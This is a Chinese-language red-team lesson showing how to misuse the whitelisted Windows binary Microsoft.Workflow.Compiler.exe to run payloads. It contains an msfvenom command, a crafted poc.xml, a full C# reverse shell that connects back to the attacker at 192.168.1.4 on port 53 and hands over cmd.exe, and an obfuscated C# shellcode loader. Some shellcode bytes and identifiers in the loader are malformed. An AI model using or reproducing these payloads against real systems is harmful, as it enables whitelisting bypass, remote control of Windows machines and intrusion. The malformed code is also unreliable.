第七十六课:基于白名单Compiler.exe执行payload第六季
注:请多喝点热水或者凉白开,身体特别重要。
说明:Microsoft.Workflow.Compiler.exe所在路径没有被系统添加PATH环境变量中,因此,Microsoft.Workflow.Compiler命令无法识别。
基于白名单Microsoft.Workflow.Compiler.exe配置payload:
Windows 7 默认位置:
1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe
2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Copied!
攻击机:192.168.1.4 Debian 靶机:192.168.1.3 Windows 7

配置攻击机msf:

靶机执行:

1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe poc.xml Micropoor.tcp
Copied!

结合meterpreter:

注:payload.cs需要用到System.Workflow.Activities
靶机执行:
1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe poc.xml Micropoor_rev1.cs
Copied!
配置攻击机msf:
payload生成:
1
msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐ f csharp
Copied!

附录:poc.xml

注:windows/shell/reverse_tcp
1
<?xml version="1.0" encoding="utf‐8"?>
2
3
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema‐instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"
4
5
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
6
7
<d2p1:string>Micropoor.tcp</d2p1:string>
8
9
</files>
10
11
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
12
13
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
14
15
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
16
17
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
18
19
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
20
21
<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
22
23
<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
24
25
<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
26
27
<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
28
29
<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
30
31
<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
32
33
<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
34
35
<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
36
37
<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
38
39
<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">‐1</warningLevel>
40
41
<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
42
43
<d2p1:checkTypes>false</d2p1:checkTypes>
44
45
<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
46
47
<d2p1:compilerOptions i:nil="true" />
48
49
<d2p1:generateCCU>false</d2p1:generateCCU>
50
51
<d2p1:languageToUse>CSharp</d2p1:languageToUse>
52
53
<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
54
55
<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
56
57
<d2p1:mtInfo i:nil="true" />
58
59
<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
60
61
</parameters>
62
63
</CompilerInput>
Copied!
Micropoor.tcp:
1
using System;
2
3
using System.Text;
4
5
using System.IO;
6
7
using System.Diagnostics;
8
9
using System.ComponentModel;
10
11
using System.Net;
12
13
using System.Net.Sockets;
14
15
using System.Workflow.Activities;
16
17
public class Program : SequentialWorkflowActivity
18
19
{
20
21
static StreamWriter streamWriter;
22
23
public Program()
24
25
{
26
27
using(TcpClient client = new TcpClient("192.168.1.4", 53))
28
29
{
30
31
using(Stream stream = client.GetStream())
32
33
{
34
35
using(StreamReader rdr = new StreamReader(stream))
36
37
{
38
39
streamWriter = new StreamWriter(stream);
40
41
StringBuilder strInput = new StringBuilder();
42
43
Process p = new Process();
44
45
p.StartInfo.FileName = "cmd.exe";
46
47
p.StartInfo.CreateNoWindow = true;
48
49
p.StartInfo.UseShellExecute = false;
50
51
p.StartInfo.RedirectStandardOutput = true;
52
53
p.StartInfo.RedirectStandardInput = true;
54
55
p.StartInfo.RedirectStandardError = true;
56
57
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
58
59
p.Start();
60
61
p.BeginOutputReadLine();
62
63
while(true)
64
65
{
66
67
strInput.Append(rdr.ReadLine());
68
69
p.StandardInput.WriteLine(strInput);
70
71
strInput.Remove(0, strInput.Length);
72
73
}
74
75
}
76
77
}
78
79
}
80
81
}
82
83
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
84
85
{
86
87
StringBuilder strOutput = new StringBuilder();
88
89
if (!String.IsNullOrEmpty(outLine.Data))
90
91
{
92
93
try
94
95
{
96
97
strOutput.Append(outLine.Data);
98
99
streamWriter.WriteLine(strOutput);
100
101
streamWriter.Flush();
102
103
}
104
105
catch (Exception err) { }
106
107
}
108
109
}
110
111
}
Copied!

Micropoor_rev1.cs:

注:x64 payload
1
using System;
2
3
using System.Workflow.Activities;
4
5
using System.Net;
6
7
using System.Net.Sockets;
8
9
using System.Runtime.InteropServices;
10
11
using System.Threading;
12
13
class yrDaTlg : SequentialWorkflowActivity {
14
15
[DllImport("kernel32")] private static extern IntPtr VirtualAlloc(UInt32 rCfMkmxRSAakg,UInt32 qjRsrljIMB, UInt32 peXiTuE, UInt32 AkpADfOOAVBZ);
16
17
[DllImport("kernel32")] public static extern bool VirtualProtect(IntPt rDStOGXQMMkP, uint CzzIpcuQppQSTBJ, uint JCFImGhkRqtwANx, out uint exgVp Sg);
18
19
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 eisuQbXKYbAvA, UInt32 WQATOZaFz, IntPtr AEGJQOn,IntPtr SYcfyeeSgPl, UInt32 ZSheqBwKtDf, ref UInt32 SZtdSB);
20
21
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr KqJNFlHpsKOV, UInt32 EYBOArlCLAM);
22
23
public yrDaTlg() {
24
25
byte[] QWKpWKhcs =
26
27
{0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
28
29
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,x48,
30
31
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,xc9,
32
33
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,x41,
34
35
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,x48,
36
37
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,x8b,
38
39
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,x8b,
40
41
0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,x41,
42
43
0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,xc1,
44
45
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,x45,
46
47
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,x8b,
48
49
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,x01,
50
51
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,x48,
52
53
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,xe9,
54
55
0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,x00,
56
57
0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,xe5,
58
59
0x49,0xbc,0x02,0x00,0x00,0x35,0xc0,0xa8,0x01,0x04,0x41,0x54,0x49,0x89,xe4,
60
61
0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,x68,
62
63
0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,x0a,
64
65
0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,x89,
66
67
0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,xd5,
68
69
0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,xba,
70
71
0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,xe5,
72
73
0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,xc9,
74
75
0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,xd5,
76
77
0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,x41,
78
79
0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,x41,
80
81
0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,x31,
82
83
0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,xc8,
84
85
0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,x40,
86
87
0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,xd5,
88
89
0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,x3c,
90
91
0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,x41,
92
93
0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,xd5};
94
95
IntPtr AmnGaO = VirtualAlloc(0, (UInt32)QWKpWKhcs.Length, 0x3000, 0x04);
96
97
Marshal.Copy(QWKpWKhcs, 0, (IntPtr)(AmnGaO), QWKpWKhcs.Length);
98
99
IntPtr oXmoNUYvivZlXj = IntPtr.Zero; UInt32 XVXTOi = 0; IntPtr pAeCTf wBS = IntPtr.Zero;
100
101
uint BnhanUiUJaetgy;
102
103
bool iSdNUQK = VirtualProtect(AmnGaO, (uint)0x1000, (uint)0x20, out BnhanUiUJaetgy);
104
105
oXmoNUYvivZlXj = CreateThread(0, 0, AmnGaO, pAeCTfwBS, 0, ref XVXTOi);
106
107
WaitForSingleObject(oXmoNUYvivZlXj, 0xFFFFFFFF);}
108
109
}
Copied!
Micropoor
Last modified 2yr ago